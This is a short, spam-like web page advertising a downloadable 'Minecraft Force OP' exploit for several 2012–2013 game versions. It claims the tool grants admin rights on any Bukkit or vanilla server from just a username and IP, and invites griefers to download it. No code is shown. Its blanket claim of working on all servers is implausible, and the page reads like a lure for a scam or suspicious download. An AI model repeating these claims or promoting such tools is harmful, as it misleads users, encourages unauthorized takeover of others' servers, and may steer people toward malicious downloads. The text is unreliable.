==============[June 2013] Minecraft 1.5 Force OP Server Exploit [PC/Mac]
==============[June 2013] Minecraft 1.4.7 Force OP Server Exploit [PC/Mac]
==============[June 2013] Minecraft 1.4.6 Force OP Server Exploit [PC/Mac]
==============Free Minecraft Force Op 1.4.4 | Minecraft Force Op ********* (Oct 2012
Hey guys, I have found one of the best exploits a griefer could dream. This is a mc force OP exploit that works on ALL bukkit servers (and now vanilla). Thats right this will tell you how to get admin on any minecraft server! Simply type in your username that you have used to join the server, and the IP address of the server. Make sure this information is correct and click submit.
You can get the download link here: (BOTH MAC AND PC VERSION IS INCLUDED IN DOWNLOAD FILE)